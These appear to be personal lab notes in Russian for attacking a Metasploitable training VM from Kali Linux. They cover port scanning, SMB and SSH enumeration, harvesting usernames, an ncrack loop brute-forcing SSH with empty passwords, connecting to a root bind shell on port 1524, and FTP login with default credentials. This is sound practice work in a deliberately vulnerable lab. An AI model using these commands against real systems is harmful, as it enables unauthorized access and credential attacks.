posle pervogo scanirovaniya proyty po vsem otkrytym portam
komandami tipa 

smbclient -L 192.168.210.129 -N


ssh root@192.168.210.129
ssh -oHostKeyAlgorithms=+ssh-rsa -oPubkeyAcceptedKeyTypes=+ssh-rsa root@192.168.210.129

msfadmin@metasploitable:~$ curl ipinfo.io/8.8.8.8
{
  "ip": "8.8.8.8",
  "hostname": "dns.google",
  "city": "Mountain View",
  "region": "California",
  "country": "US",
  "loc": "37.4056,-122.0775",
  "org": "AS15169 Google LLC",
  "postal": "94043",
  "timezone": "America/Los_Angeles",
  "readme": "https://ipinfo.io/missingauth",
  "anycast": true
}

┌──(root㉿kali)-[/home/…/NetworkResearch/temp/remote_control_results/1307015329]
└─# grep -i ':x:' log.txt | awk -F ':' '{print $1}' > user_list.txt
                                                                                                                                                                                                                                           
┌──(root㉿kali)-[/home/…/NetworkResearch/temp/remote_control_results/1307015329]
└─# for i in $(cat user_list.txt); do ncrack -p 22 --user $i --pass "" 192.168.210.129; done

nc 192.168.41.129 1524                  

root@metasploitable:/# pwd

Попробуй вручную так:
nc 192.168.41.129 21
А потом внутри сессии по очереди:
USER msfadmin
PASS msfadmin

ili vot tak
ftp 192.168.41.129                              
Connected to 192.168.41.129.
220 (vsFTPd 2.3.4)
Name (192.168.41.129:kali): msfadmin
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> pwd
Remote directory: /home/msfadmin


fping -a -g 192.168.117.0/24
for i in $(cat addres.txt ); do nmap $i -sV --version-all -oN ./res_$i.txt -oX ./res_$i.xml; done
xsltproc res_192.168.117.2.xml -o xml_2_nmap.html

Если xsltproc не установлен:
sudo apt install xsltproc


